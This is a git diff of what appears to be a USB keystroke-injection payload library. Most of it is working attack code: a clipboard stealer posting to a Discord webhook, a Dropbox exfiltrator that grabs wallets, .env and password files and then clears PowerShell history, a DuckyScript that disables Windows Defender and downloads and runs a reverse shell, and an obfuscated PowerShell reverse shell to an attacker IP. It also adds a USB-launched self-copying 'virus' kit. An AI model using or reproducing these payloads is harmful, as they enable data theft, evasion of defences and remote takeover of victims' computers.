diff --git a/payloads/library/credentials/Duckie-Harvest/sy_cred.ps1 b/payloads/library/credentials/Duckie-Harvest/Duckie-Harvest/sy_cred.ps1
similarity index 100%
rename from payloads/library/credentials/Duckie-Harvest/sy_cred.ps1
rename to payloads/library/credentials/Duckie-Harvest/Duckie-Harvest/sy_cred.ps1
diff --git a/payloads/library/credentials/Funni_Stick_V3/pw.exe b/payloads/library/credentials/Funni_Stick_V3/pw.exe
deleted file mode 100644
index 3cd436064..000000000
Binary files a/payloads/library/credentials/Funni_Stick_V3/pw.exe and /dev/null differ
diff --git a/payloads/library/execution/DNS-TXT-CommandInjection/powershellReverseShellOne-liner.ps1 b/payloads/library/execution/DNS-TXT-CommandInjection/powershellReverseShellOne-Liner.ps1
similarity index 100%
rename from payloads/library/execution/DNS-TXT-CommandInjection/powershellReverseShellOne-liner.ps1
rename to payloads/library/execution/DNS-TXT-CommandInjection/powershellReverseShellOne-Liner.ps1
diff --git a/payloads/library/exfiltration/Copy-And-Waste/c.ps1 b/payloads/library/exfiltration/Copy-And-Waste/c.ps1
deleted file mode 100644
index 0215ae3b3..000000000
--- a/payloads/library/exfiltration/Copy-And-Waste/c.ps1
+++ /dev/null
@@ -1,36 +0,0 @@
-Add-Type -AssemblyName WindowsBase
-Add-Type -AssemblyName PresentationCore
-
-function dischat {
-
-  [CmdletBinding()]
-  param (    
-  [Parameter (Position=0,Mandatory = $True)]
-  [string]$con
-  ) 
-  
-  $hookUrl = 'YOUR DISCORD WEBHOOK'
-  
-$Body = @{
-  'username' = $env:username
-  'content' = $con
-}
-
-
-Invoke-RestMethod -Uri $hookUrl -Method 'post' -Body $Body
-
-}
-
-
-dischat (get-clipboard)
-
-while (1){
-    $Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl')
-    $Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::RightCtrl)
-    $cKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::c)
-    $xKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::x)
-
-       if (($Lctrl -or $Rctrl) -and ($xKey -or $cKey)) {dischat (Get-Clipboard)}
-       elseif ($Rctrl -and $Lctrl) {dischat "---------connection lost----------";exit}
-       else {continue}
-} 
\ No newline at end of file
diff --git a/payloads/library/exfiltration/Dropbox-Bandit/ex.ps1 b/payloads/library/exfiltration/Dropbox-Bandit/ex.ps1
deleted file mode 100644
index e90ac21fd..000000000
--- a/payloads/library/exfiltration/Dropbox-Bandit/ex.ps1
+++ /dev/null
@@ -1,19 +0,0 @@
-# directory to steal from (ALL SUBDIRECTORIES INSIDE AS WELL)
-$s=$env:USERPROFILE+"\Documents\*";
-# filetypes to exfiltrate
-$fileTypes="*.txt","*wallet*","*.env","*.x*","*.doc*","*pass*","*auth*";
-##############################################################################################
-#                  Dropbox API values: Follow read.me tutorial to get these!                 #
-##############################################################################################
-# refresh_token
-$r="REFRESH_TOKEN_HERE";
-# App key
-$u = 'APP_KEY_HERE';
-# App secret
-$p = 'APP_SECRET_HERE';
-# do not touch below this line unless you know what you're doing
-$ds=$env:TMP+"\cpy";$n = 0;$mb = 0;if(Test-Path $ds){rm $ds -Fo -R;}GCI $s -R -I $fileTypes|%{$sz = ((GCI $_.FullName).length/1MB);if($size -lt 100){$mb+=$sz;if($mb -ge 100){$mb = 0;$n++;}ROBOCOPY $_.Directory ("$ds\$n\") $_.Name /MT 128 |Out-Null;}}
-$a=(Invoke-RestMethod https://api.dropbox.com/oauth2/token -Method Post -Body @{grant_type = "refresh_token";refresh_token = $r;} -Headers @{"Authorization" = "Basic "+ [System.Convert]::ToBase64String([System.Text.Encoding]::ASCII.GetBytes("${u}:${p}"));"Content-Type" = "application/x-www-form-urlencoded";}).access_token;
-Add-Type -AssemblyName System.IO.Compression.Filesystem;$d=get-date -f MM-dd-yyyy;$t=get-date -f HH-MM-ss;for($i = 0;$i -le $n;$i++){$z="$env:TMP\$env:USERNAME-$i-$t.zip";[System.IO.Compression.ZipFile]::CreateFromDirectory("$ds\$i\",$z,0,$false);
-Invoke-RestMethod https://content.dropboxapi.com/2/files/upload -Method Post -InFile $z -Headers @{"Authorization"="Bearer $a";"Content-Type"="application/octet-stream";"Dropbox-API-Arg"="{`"path`":`"/$(hostname)-$env:USERNAME/$d/$env:USERNAME-$i-$t.zip`",`"mode`":`"add`",`"autorename`":true,`"mute`":false}";}|Out-Null;}
-rm $ds -Fo -R;for($i = 0;$i -le $n;$i++){rm "$env:TMP\$env:USERNAME-$i-$t.zip" -Fo;}Clear-History;rm "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\*" -Fo;exit;
\ No newline at end of file
diff --git a/payloads/library/recon/Silent-Watcher/README.md b/payloads/library/recon/Silent-Watcher/README.md
new file mode 100644
index 000000000..cdaf285f0
--- /dev/null
+++ b/payloads/library/recon/Silent-Watcher/README.md
@@ -0,0 +1,27 @@
+# Silent Watcher
+
+This is a combination of a DuckyScript payload and a virus template that I created.
+To use it, compile `payload.txt` and add it to the root directory of your hotplug. BE SURE TO READ THE CODE!
+Some variables are specific to your use case and you may find it in your interest to change the for your purposes.
+This program is designed to work on any machine that operates on Windows 11 and higher.
+
+# How Does It Work?
+
+When the primed hotplug is inserted into the host machine, it will wait for "CAPSLOCK" to toggle on. This is INTENTIONAL, this is intended to be most effective as a waiting game of sorts. The program will then open a powershell window and run `event.ps1` from the virus directory in the hotplug.
+When the `event.ps1` is run, it will listen for any change in the `TEMP` directory of the current user. Once a change is heard, `event.ps1` starts `call.ps1`.
+`call.ps1` will then begin a chain reaction which results in `pull.ps1` being copied into "User\$yourUsername\Documents\virus\Virus" and then run.
+`pull.ps1` then copies the rest of the "virus" directory of the hotplug into the newely created "Virus" directory.
+
+# Tips
+
+You can change this program to most use cases, should there be another directory you would prefer to listen to, change the PATH in `event.ps1` to your desired directory.
+You can also change the timer in the same file to your desired time if you are more patient.
+The copy directory can be changed as well by changing the PATH in both the `call.ps1` and `pull.ps1` scripts
+
+# Disclaimer
+
+I do not take responsibility for any malicious use of this program by others. This is a proof of concept for my own sense of accomplishment, and as such is intended only for educational use. Use this program at your own discretion!
+
+   **The Creator**
+   
+   -- Mavis
diff --git a/payloads/library/recon/Silent-Watcher/payload.txt b/payloads/library/recon/Silent-Watcher/payload.txt
new file mode 100644
index 000000000..e69de29bb
diff --git a/payloads/library/recon/Silent-Watcher/virus/call.ps1 b/payloads/library/recon/Silent-Watcher/virus/call.ps1
new file mode 100644
index 000000000..5e9065483
--- /dev/null
+++ b/payloads/library/recon/Silent-Watcher/virus/call.ps1
@@ -0,0 +1,22 @@
+
+$driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE label='DUCKY'").DriveLetter
+$localUsername = $env:USERNAME
+New-Item -Path "C:\Users\$localUsername\Documents" -Name 'virus' -ItemType "directory"
+New-Item -Path "C:\Users\$localUsername\Documents\virus" -Name 'Virus' -ItemType "directory"
+$pullPathBeforeCopy = Get-ChildItem -Path "$driveLetter\virus" -Recurse -Filter "pull.ps1"
+
+$pathBeforeCopy = Get-ChildItem -Path "$driveLetter\" -Directory -Recurse -Filter "virus"
+$pathAfterCopy = "C:\Users\$localUsername\Documents\virus"
+
+Copy-Item -Path $pathBeforeCopy -Destination $pathAfterCopy -Recurse
+Copy-Item -Path $pullPathBeforeCopy -Destination $pathAfterCopy\Virus
+
+$time_in_seconds = 10
+while ($time_in_seconds -gt 0) {
+    #Write-Host "Time remaining: $seconds"
+    Start-Sleep -Seconds 1
+    $time_in_seconds--
+}
+Start-Process powershell -ArgumentList "-File", "$pathAfterCopy\Virus\pull.ps1"
+
+exit
diff --git a/payloads/library/recon/Silent-Watcher/virus/event.ps1 b/payloads/library/recon/Silent-Watcher/virus/event.ps1
new file mode 100644
index 000000000..2dcf2d4f1
--- /dev/null
+++ b/payloads/library/recon/Silent-Watcher/virus/event.ps1
@@ -0,0 +1,58 @@
+$folder = "C:\Users\$env:USERNAME\AppData\Local\Temp\"
+$filter = "*.LOG"
+$Watcher = New-Object IO.FileSystemWatcher $folder, $filter -Property @{ 
+    IncludeSubdirectories = $false
+    NotifyFilter = [IO.NotifyFilters]'FileName, LastWrite'
+}
+$onCreated = Register-ObjectEvent $Watcher -EventName Created -SourceIdentifier FileCreated -Action {
+   $path = $Event.SourceEventArgs.FullPath
+   $name = $Event.SourceEventArgs.Name
+   $changeType = $Event.SourceEventArgs.ChangeType
+   $timeStamp = $Event.TimeGenerated
+   Write-Host "The file '$name' was $changeType at $timeStamp"
+   Write-Host $path
+   #Move-Item $path -Destination $destination -Force -Verbose
+}
+
+Function Register-Watcher {
+    param ($folder)
+    $filter = "*.*" #all files
+    $watcher = New-Object IO.FileSystemWatcher $folder, $filter -Property @{ 
+        IncludeSubdirectories = $false
+        EnableRaisingEvents = $true
+    }
+
+    $changeAction = [scriptblock]::Create('
+        # This is the code which will be executed every time a file change is detected
+        $path = $Event.SourceEventArgs.FullPath
+        $name = $Event.SourceEventArgs.Name
+        $changeType = $Event.SourceEventArgs.ChangeType
+        $timeStamp = $Event.TimeGenerated
+        Write-Host "The file $name was $changeType at $timeStamp"
+        Invoke-Expression -Command .\call.ps1
+        if (Test-Path -Path "C:\Users\mason\Documents\virus") {
+            Write-Host "Directory already exists"
+            Get-EventSubscriber -Force | Unregister-Event -Force | exit
+	    
+        } else {
+            Invoke-Expression -Command .\call.ps1 
+        }
+    ')
+
+    Register-ObjectEvent $Watcher -EventName "Changed" -Action $changeAction
+}
+
+ Register-Watcher "$folder"
+ $seconds = 60
+ while ($seconds -gt 0) {
+     Write-Host "Time remaining: $seconds"
+     Start-Sleep -Seconds 1
+     $seconds--
+ }
+Write-Host "Script Finished!"
+
+
+
+Get-EventSubscriber -Force | Unregister-Event -Force
+exit
+
diff --git a/payloads/library/recon/Silent-Watcher/virus/pull.ps1 b/payloads/library/recon/Silent-Watcher/virus/pull.ps1
new file mode 100644
index 000000000..aebf450df
--- /dev/null
+++ b/payloads/library/recon/Silent-Watcher/virus/pull.ps1
@@ -0,0 +1,9 @@
+$localUsername = $env:USERNAME
+$driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE label='DUCKY'").DriveLetter
+$callPathBeforeCopy = Get-ChildItem -Path $driveLetter\virus -Recurse -Filter "call.ps1"
+$callMoveDir = "C:\Users\$localUsername\Documents\virus\Virus\call.ps1"
+$eventPathBeforeCopy = Get-ChildItem -Path $driveletter\virus -Recurse -Filter "event.ps1"
+$eventMoveDir = "C:\Users\$localUsername\Documents\virus\Virus\event.ps1"
+
+Copy-Item -Path $callPathBeforeCopy -Destination $callMoveDir
+Copy-Item -Path $eventPathBeforeCopy -Destination $eventMoveDir
\ No newline at end of file
diff --git a/payloads/library/remote_access/Hidden_access/payload.txt b/payloads/library/remote_access/Hidden_access/payload.txt
deleted file mode 100644
index f40e6bf3f..000000000
--- a/payloads/library/remote_access/Hidden_access/payload.txt
+++ /dev/null
@@ -1,37 +0,0 @@
-REM Author: makozort 
-REM Title: Hidden_access 
-REM Target: windows 10 
-REM Description: gain a reverse shell to targets pc, the script works VERY qucikly agains machines with disabled defender
-REM THIS SCRIPT IS INTENDED FOR USE ON SYSTEMS YOU OWN OR HAVE BEEN GIVEN PERMISSION TO USE, I TAKE NO RESPONSIBILITIES FOR ANY MISUSE
-REM This is the rs.ps1 to host
-REM $client = New-Object System.Net.Sockets.TCPClient("{IP here}",{PORT HERE});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
-DELAY 1000
-CTRL ESC
-DELAY 300
-REM this block disables windows defender, delete it if you dont need to. target may have varibles that mean you need to change how many times "TAB" is hit
-STRING windows security
-DELAY 300
-ENTER
-DELAY 1000
-ENTER
-TAB
-TAB
-TAB
-TAB
-DELAY 300
-ENTER
-DELAY 600
-SPACE
-DELAY 600
-LEFT
-ENTER
-DELAY 300
-ALT F4
-GUI r
-DELAY 600
-REM open up powershell in hidden mode, run the command (the rs.ps1 that needs to be edited )you have already uploaded somewhere so that the ducky does not have to type it all out
-STRING powershell -w hidden IEX (New-Object Net.WebClient).DownloadString('LINK HERE');
-ENTER
-DELAY 600
-LEFT
-ENTER
diff --git a/payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt b/payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt
deleted file mode 100644
index 4cb1e4c38..000000000
--- a/payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt
+++ /dev/null
@@ -1,71 +0,0 @@
-REM       ReverseDuckyII
-REM       Version 2.0
-REM       OS: Windows / Multi
-REM       Author: 0i41E
-REM       Requirement: DuckyScript 3.0
-
-REM       TCP Reverse shell executed hidden in the background, the CAPSLOCK light at the end will indicate that the payload was executed.
-REM       If inserted into a non Windows machine, the Ducky will appear broken.
-REM       DON'T FORGET TO START LISTENER
-
-REM PASSIVE_WINDOWS_DETECT extension, made by Korben, to indentify the OS
-EXTENSION PASSIVE_WINDOWS_DETECT
-    REM VERSION 1.0
-
-    REM Windows fully passive OS Detection and passive Detect Ready
-    REM Includes its own passive detect ready. Does not require
-    REM additional extensions
-
-    REM USAGE:
-    REM Extension runs inline (here)
-    REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
-    REM boot delay
-    REM $_OS will be set to WINDOWS or NOT_WINDOWS
-
-    REM CONFIGURATION:
-    DEFINE MAX_WAIT 150
-    DEFINE CHECK_INTERVAL 20
-    DEFINE WINDOWS_HOST_REQUEST_COUNT 2
-    DEFINE NOT_WINDOWS 7
-
-    VAR $MAX_TRIES = MAX_WAIT
-    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
-        DELAY CHECK_INTERVAL
-        $MAX_TRIES = ($MAX_TRIES - 1)
-    END_WHILE
-    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN
-        $_OS = WINDOWS
-    ELSE
-        $_OS = NOT_WINDOWS
-    END_IF
-
-    REM EXAMPLE USAGE AFTER EXTENSION
-    REM IF ($_OS == WINDOWS) THEN
-    REM     STRING HELLO WINDOWS!
-    REM ELSE
-    REM     STRING HELLO WORLD!
-    REM END_IF
-END_EXTENSION
-
-REM Configure your settings below:
-REM Insert the attacking IP between '' & define your port
-DEFINE ATTACKER '192.168.178.25'
-DEFINE PORT 4444
-REM Set the default DELAY
-DEFINE WAIT 500
-
-IF ($_OS == WINDOWS) THEN
-    DELAY 1500
-    GUI r
-    DELAY WAIT
-    STRINGLN powershell -NoP -NonI -w h
-    DELAY WAIT
-    STRINGLN $c=nEw-oBjECt SYstEm.NEt.SOcKEts.TCPClIEnt( ATTACKER , PORT );$s=$c.GetSTreAm();[byte[]]$b=0..65535|%{0};whILe(($i=$s.REad($b,0,$b.LeNgTh))-ne 0){;$d=(NEw-OBjeCT -TYpeNamE sYsTeM.TeXt.ASCIIEncoding).GetStRIng($b,0,$i);$z=(ieX $d 2>&1|oUt-STriNG);$x=$z+"Ducky@PS "+(pwd)+"> ";$y=([text.encoding]::ASCII).GEtByTEs($x);$s.WrIte($y,0,$y.LEnGTh);$s.FlUSh()};$c.CloSE();exit
-REM Capslock light will indicate a finished payload
-    CAPSLOCK
-ELSE
-REM Inserting the Ducky into a non Windows machine will result in ATTACKMODE OFF
-    ATTACKMODE OFF
-END_IF
-
-